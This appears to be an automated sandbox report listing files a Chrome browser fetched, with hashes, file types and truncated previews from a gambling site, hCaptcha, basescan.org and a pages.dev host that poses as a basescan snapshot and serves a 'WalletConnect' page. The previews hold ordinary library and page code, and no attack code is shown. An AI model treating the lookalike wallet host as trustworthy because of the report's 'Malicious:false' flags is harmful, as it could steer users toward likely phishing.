                                                                                                                                                                                                                                              SSDEEP:96:jLDxzCP4A7n3EADsumtJB4QGlG+xslb6yJ:jLFCPjnHCd4QGlyp
                                                                                                                                                                                                                                              MD5:F9DDC754A2EE08787AD243596AC62040
                                                                                                                                                                                                                                              SHA1:34C4D349A484536029C865C9A4AB36F59980E58A
                                                                                                                                                                                                                                              SHA-256:5A91E5E23471C5F6A498CA85CEB9BF1F6F4BC154E378DD4ADA586C93280677AE
                                                                                                                                                                                                                                              SHA-512:CBB2C80E8D1A69F2F1DFDF519144AA5B595DF5E4237475476427F4E7E9C13ED2A72295E59E86668F24A198DA348060FB090A032ACD97241CBCE6C8CA69743DC0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/Bingo.page-I1m2tVcx.js
                                                                                                                                                                                                                                              Preview:import{$ as R,aQ as L,a3 as N,ba as O,c as a,t as s,W as U,i as t,af as j,a5 as F,f as c,V as H,x as C,h as f,w as M,a9 as P,p as J,F as V,aW as Q,s as T,l as W,m as X,e as q,Q as Y,D as b,q as Z}from"./index-DD2Zk4iT.js";import{S as p}from"./index-CMxvzQWG.js";var ee=c('<div class="absolute flex h-5 items-center rounded-xl right-1.5 top-1.5 bg-black_alpha20 px-1.5 backdrop-blur-lg"><img class="mr-1 w-3"src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAMAAADXqc3KAAAAV1BMVEUAAAD///+vv7+zvsKzvcD///+yv8Czv7////////////////+0vsH///+0v8L///+0v8L///////////+zvsGzvcKyvcK0vb+zv8Ozv7////+zvsH///9BsiEjAAAAG3RSTlMAvxC/gHBgIK8gEO/n35+Pj4BgUM+vcHBAQDB6axrrAAAAhUlEQVQoz4XOWRKEIAxF0ciMs23PZP/r7C5RIcTS83lfUQSuvceHHC3Log+LXhSDDCtJuwm7JxnaNNzJDyGT/2LzwZ68YEfxsz5pMECoraut0KV9AWONUkbAgdr7g6hdh3+Nu5GuG9x1OvUKCVevfcDCELtH5hs/4EO8YObDDIupKkxw4geB5Rgg/yXcwgAAAABJRU5ErkJggg=="><span class="font-semibold text-xs">'),te=c('<div class="rounded-lg bg-layer4 p-2 w-full h-full"><div class=relative><img cl
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):942
                                                                                                                                                                                                                                              Entropy (8bit):7.792052485042783
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:1kqt0Eb0gWufAOax40VhcmAay/SNiL5kdxzO8Lq4Ajg:Oq04Wu4Oax40VhJx/iidpW/8
                                                                                                                                                                                                                                              MD5:F192E75222D61D41499C1E92F3365E8E
                                                                                                                                                                                                                                              SHA1:DDCA1D6AE707998723A8C73E6AA65F56FF635C7A
                                                                                                                                                                                                                                              SHA-256:A94A9E3403780A0C11F8B43A4AE80BC12D51961A5BC7ACC63D3454E7A1D5B0BE
                                                                                                                                                                                                                                              SHA-512:7612F88CB7FA0408B0174CE72FA125E4CE69E1E0491ED619EFBD458F1FC8F32629DFD9A2FB71EBA570AFB9F8637E2E04F556760A4195E233BF6FF3BF8CE38650
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/USDT.black.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../c...Gb m.....6..m....3;..m....=.6..9.4.y.0......3u..M]..c..UE.;..?.......Y.N..m....T.u..N5U...Lu.......C.EEE.D...>.*^|.....B.C.".#...m.i..aff.s....QH........n#)R...7.......v5..Lxk........@..lw%.i=.)..r..! 8.<UrY........:.(y.%..|.....;\n.P.....e.{,........(vtG.........@..Q...$4.r.&...<w........}.....)G.b..s.....)~Mz.7k&@.u=.$.Y.].t.|. ..lN...7K@..C6.B^x..2. .ZPf..(@.x~....!m......>....0......a"!k.......\.;x.K..}f/z....@.x.t...J.VS...B&......e0..'..j...X.N....B.T.Tk....z..KF..p..c<....x..j.c.Y.<.\C..)H3..d....?..m..~7).....v.p....ce5.e.K.Qf..0.X..8..|Z).1G..D.`..S5T:.....f.....Gg8[nrI'9...K....6"u.....W......Md..Z....j.*.L"...T}....*......5.......r9..W..e...lY.,..A..I....jK.,....Z...&...T.P*..Hu..u..u..m.=.\.......4...|.I....[Q.;,3...K..O..6..A..,8c(.....2.i...[Rei5...1F.&;.1_.LD..a.........1W...E9.0b"Z.v..Qi.k."f.E.S.....h-b.:..h..C...9':.....C...9Y.Dn..9r6.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2656)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2657
                                                                                                                                                                                                                                              Entropy (8bit):5.317173494483139
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:g1H/IiI2RB0Pf+eT4CI7OWZhivUKF6tLiNL+uzjjXAuyiGjf5PGYGCH2f0mAicB:WH/17VeCpKF6tLiNLxv+iMGYx+U
                                                                                                                                                                                                                                              MD5:DA38EAAB7566FD0581D84862534947CD
                                                                                                                                                                                                                                              SHA1:81C94309493F5EC6EC631E5BF66A67B63F35E17C
                                                                                                                                                                                                                                              SHA-256:F8EA4AC456BCA6A028B1C0226D7BBD2CFE30D54143D65F738B298503DEE88282
                                                                                                                                                                                                                                              SHA-512:73E6175F69DCFD4024919A17F99074E6E4973EA37A479DC6325968747351A2C150E50D933F396F18441A92618F756278D79A9949C861672DBE29F959834C5247
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:!function(n,e,r,t,i,o,a,c,s){for(var u=s,f=0;f<document.scripts.length;f++)if(document.scripts[f].src.indexOf(o)>-1){u&&"no"===document.scripts[f].getAttribute("data-lazy")&&(u=!1);break}var p=[];function l(n){return"e"in n}function d(n){return"p"in n}function _(n){return"f"in n}var v=[];function y(n){u&&(l(n)||d(n)||_(n)&&n.f.indexOf("capture")>-1||_(n)&&n.f.indexOf("showReportDialog")>-1)&&m(),v.push(n)}function g(){y({e:[].slice.call(arguments)})}function h(n){y({p:n})}function E(){try{n.SENTRY_SDK_SOURCE="loader";var e=n[i],o=e.init;e.init=function(i){n.removeEventListener(r,g),n.removeEventListener(t,h);var a=c;for(var s in i)Object.prototype.hasOwnProperty.call(i,s)&&(a[s]=i[s]);!function(n,e){var r=n.integrations||[];if(!Array.isArray(r))return;var t=r.map((function(n){return n.name}));n.tracesSampleRate&&-1===t.indexOf("BrowserTracing")&&(e.browserTracingIntegration?r.push(e.browserTracingIntegration({enableInp:!0})):e.BrowserTracing&&r.push(new e.BrowserTracing));(n.replaysSes
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (27094)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):27151
                                                                                                                                                                                                                                              Entropy (8bit):4.9157447814907345
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:mkB/tbe7BMMs68g7/nHXSUdP3J7KKukjIL/+MKWXr569T6NvLtOyXovIyj5/mjKy:PO2Rd69T/Iyj583J
                                                                                                                                                                                                                                              MD5:AA0A5F7A6A6FFADF2208D89C8938623E
                                                                                                                                                                                                                                              SHA1:F7D984F38A12904756F6426D14712FB25D7EC101
                                                                                                                                                                                                                                              SHA-256:A724179382C3248F0C2EB2B00C22E48B8347198457AFD7300F372B977BE62589
                                                                                                                                                                                                                                              SHA-512:C77A22BD53C3CB1E51B1C0C41A1BABA7D25AA7F8B1D2778A6718DE5D1B99D7A286323896834AD057E364532242753FC9AD3C3E841AD0D4BB6A9036F1C58C59B3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/index-b0d72fd9.js
                                                                                                                                                                                                                                              Preview:const e="Action",o="Add",t="Affiliate",i="BRONZE",a="Bet",n="Buy",r="Cancel",s="Card",c="Change",l="Completed",u="Confirm",d="Copy",h="Currency",y="DIAMOND",m="Deposit",f="Details",g="Device",p="Disable",w="Duration",v="Edit",b="Email",P="Enable",S="Feedback",_="GOLD",T="Global",V="History",C="Language",A="Location",E="Marketing",I="Medals",k="Medium",R="NFTs",N="Notification",Y="OK",D="Online",O="PLATINUM",F="Passed",L="Password",M="Paste",G="Permanent",W="Position",U="Preferences",H="Prize",B="Profile",x="Quantity",q="Remove",K="Resend",z="Rewards",J="Rollover",j="SILVER",Q="Save",Z="Search",X="Security",$="Sessions",ee="Statistics",oe="Status",te="Strong",ie="Submit",ae="Success",ne="Swap",re="TIP",se="Talkative",ce="Telegram",le="Theme",ue="Transaction",de="Unlimited",he="Username",ye="VIP",me="Verified",fe="Verify",ge="Wagered",pe="Weak",we="Win",ve="Withdraw",be="month",Pe="success",Se={"1. Check if your phone bill is overdue.":"1. Check if your phone bill is overdue.","2. Check
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (14965), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):14967
                                                                                                                                                                                                                                              Entropy (8bit):4.772171120866488
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:pL5u/nTfc3aqPJRQ9CPjOtWlUJKLPcH9tPOs:3u/TfXARQ9htWGSPcdws
                                                                                                                                                                                                                                              MD5:BA5948C0BDA0F5F26BD3068CE565DEAA
                                                                                                                                                                                                                                              SHA1:6D28595693CE13F1A79DB7D5C73BD82B13CF63B5
                                                                                                                                                                                                                                              SHA-256:C2A282DD6DAC10A3FBF469B4E67F489608777854E6D157BF11233DFBAA16851E
                                                                                                                                                                                                                                              SHA-512:B697887282E03A0838BC8FBA10B5F85144DCF14727A01703EA6BBF047B30860C58AEF75BCFC9FE76AE5F291BE60369AD22CF39C98D7A1D8AC90B4CA68B2776A6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/select2/dist/css/select2.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:.select2-container{box-sizing:border-box;display:inline-block;margin:0;position:relative;vertical-align:middle}.select2-container .select2-selection--single{box-sizing:border-box;cursor:pointer;display:block;height:28px;user-select:none;-webkit-user-select:none}.select2-container .select2-selection--single .select2-selection__rendered{display:block;padding-left:8px;padding-right:20px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.select2-container .select2-selection--single .select2-selection__clear{position:relative}.select2-container[dir="rtl"] .select2-selection--single .select2-selection__rendered{padding-right:8px;padding-left:20px}.select2-container .select2-selection--multiple{box-sizing:border-box;cursor:pointer;display:block;min-height:32px;user-select:none;-webkit-user-select:none}.select2-container .select2-selection--multiple .select2-selection__rendered{display:inline-block;overflow:hidden;padding-left:8px;text-overflow:ellipsis;white-space:nowrap}.select2-cont
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (39933)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):358369
                                                                                                                                                                                                                                              Entropy (8bit):5.52539643537815
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:8w0sdDTn26XnaNBC2wjlCng/arzqf27Ln:0AaNhz
                                                                                                                                                                                                                                              MD5:92F6F12C84CC92E4F58143EEF4FFE124
                                                                                                                                                                                                                                              SHA1:BCB87F6A62CCFF2C75568AE74D4E19BC015629EB
                                                                                                                                                                                                                                              SHA-256:96512AAC90CA9AC3BF2E7B0A855AFC46CABC3C1BAD06FAEF0D44C7DB67281ABD
                                                                                                                                                                                                                                              SHA-512:2D8FF33547381F5B640BA4B399D3A8A9B7F5028EC474DC9F51E10CB105BF135FAF7318AFD16819C4A79020F097DB24C5AA3E87C4EF1C01417C011ABA3872457B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://newassets.hcaptcha.com/captcha/v1/70b4624/static/hcaptcha.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html lang="en" data-id="hcaptcha-frame-70b4624">.<head>. <title>hCaptcha</title>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta http-equiv="Content-Security-Policy" content="object-src 'none'; base-uri 'self'; worker-src blob:; script-src 'self' 'unsafe-eval' 'sha256-66UqS9okiSm9hwNFV9WsEL7pp+hVNVyAH1LtDpbfURU=';">. <style type="text/css">*{-webkit-tap-highlight-color:transparent;-webkit-font-smoothing:antialiased}body,html{margin:0;padding:0;font-family:-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen,Ubuntu,"Helvetica Neue",Arial,sans-serif;overflow:hidden;height:100%;width:100%;background-color:rgba(255,255,255,0);background-color:transparent}fieldset{margin:0;padding:15px 20px;border:none}button:focus,input:focus,select:focus,textarea:focus{outline:0}:focus{border:none;outline:0}textarea{border:none;overflow:auto;outline:0;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;resize:non
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (20363), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):20541
                                                                                                                                                                                                                                              Entropy (8bit):5.220121183522609
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:2YhLSLf4UzgCyKnxRsyPMbOXrEQAkxHOxvqAQD75zfS5vIXm3YzGp/ARdOgHhgzx:3LSLAUzgCpRMbcxHOxvwD7pS5vezy/AY
                                                                                                                                                                                                                                              MD5:18D4D460CCAA3D518B6C3D6B3388506F
                                                                                                                                                                                                                                              SHA1:5A8C2BB899EBC1A75AB1AA2103C5A9BE4FADDA8F
                                                                                                                                                                                                                                              SHA-256:CC41677B202887CA83E2C6DE0234822EF1332FE943AFAB84C12BB7B20A275E1F
                                                                                                                                                                                                                                              SHA-512:75B668F53E24D86A9157980BEB5E14C9765E7B65D2A50E180124FE2FDCA33EC8AC4DC7D1D10BAB4E8C341679B742654EF30FC2B86CB61FF66CCE68093F4E53A9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/*.. Copyright (C) Federico Zivolo 2018.. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT)... */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function r(e){return 11===e?re:10===e?pe:re||pe}function p(e){if(!e)return document.documentElement;for(var o=r(10)?document.body:null,n=e.offsetParent;n===o&&e.nextElementSibling;)n=(e=e.nextElementSibling).offsetPar
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):23888
                                                                                                                                                                                                                                              Entropy (8bit):7.9322538444775965
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:IYNg7/A01G9OKXF3D4OsEmN5nYD3BRcLSdON9ZbQH3a9/ywNf7lYIYlVQ9Bz4Sa:IYyRGrd8O7mNSD3QSdOJb9q0DyILBQ
                                                                                                                                                                                                                                              MD5:889ED189D79EA06392A7A812FBBF8C53
                                                                                                                                                                                                                                              SHA1:6F981C4104C4BCDA12397942C9473B6007A17482
                                                                                                                                                                                                                                              SHA-256:A6524C65294045136E8096564194C65A0E53A0B45ED0DAC5C64E3D7C9DF1C8FE
                                                                                                                                                                                                                                              SHA-512:BA8C9FB45045F7AFFEC70968B4FA627D36857FE3C08F2248A4A08C33FF8CF97DB6F402DD3F0E5D6D0FBB84D7876924FDA0AB5B5979F5CAC9783C6FC3F2CFF9E2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/13106_The%20Zeus%20vs%20Hades.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..O....(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1267)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1268
                                                                                                                                                                                                                                              Entropy (8bit):5.091535688799997
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:lhJRXBjJnjrnrjNNjjj+Pjb0vQsx3pdk9I4Y0CAsvQsxtpdkzPk8DQs/8FdkKmQI:LJRX9trnXLfO4Isx309I43CAsIsxt0zf
                                                                                                                                                                                                                                              MD5:C359AA0CE89A43C007FC38602AFB603B
                                                                                                                                                                                                                                              SHA1:CE75E1EFF83C35FB55BB7CA6C75440DB0BB0E783
                                                                                                                                                                                                                                              SHA-256:A1BE9E275E710799A2FAC909EC2CF0F2E17D3043C8EB39ADC59A1A4424673776
                                                                                                                                                                                                                                              SHA-512:F1C82E53A1920C145FC9A429EC749BF13AC12A6B7E8DC2491B117848C35019532AF09F3FCB476B1FAF2FCEC155F1D367DA32AD1F3310F97B6C0B6641A539C50B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-76d972f3.js
                                                                                                                                                                                                                                              Preview:import{h as e}from"./http-f4555b94.js";import{B as s}from"./baseService-449c2e3e.js";const r={getSpinFeeds:()=>e.post("/activity/lucky/spin/news/",{start:new Date().getTime()-24*60*60*1e3}),getSpinRewardSettings:()=>e.get("/activity/lucky/spin/settings/"),getUserSpinConfig:()=>e.get("/activity/lucky/spin/info/"),requestSpin:t=>e.post("/activity/lucky/spin/lottery/",t),getSpinLog(){return e.get("/activity/lucky/spin/giftLog/list100/")}};class n extends s{constructor(i){super(),this.api=i}spinFeedResource(){return this.createSharedResource(()=>({queryKey:[this.spinFeedResource.name],queryFn:this.api.getSpinFeeds,initialData:{totalBonus:0,updates:[]}}),{persisted:!0})}spinRewardSettingsResource(){return this.createSharedResource(()=>({queryKey:[this.spinRewardSettingsResource.name],queryFn:this.api.getSpinRewardSettings,initialData:{version:0,sections:[],fiat:!1}}),{persisted:!0})}userSpinConfigResource(){return this.createSharedResource(()=>({queryKey:[this.userSpinConfigResource.name],q
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (6687)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):6688
                                                                                                                                                                                                                                              Entropy (8bit):5.720132483751706
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:k25t3tyHm6+46tWGETbAPxvvp0p0p0pXaAydS6zz0rc29+pAiff:h5t3tyHmX4VGETsJfnUvkAs
                                                                                                                                                                                                                                              MD5:CEB1D5324E381E5B689D5F3241E43D11
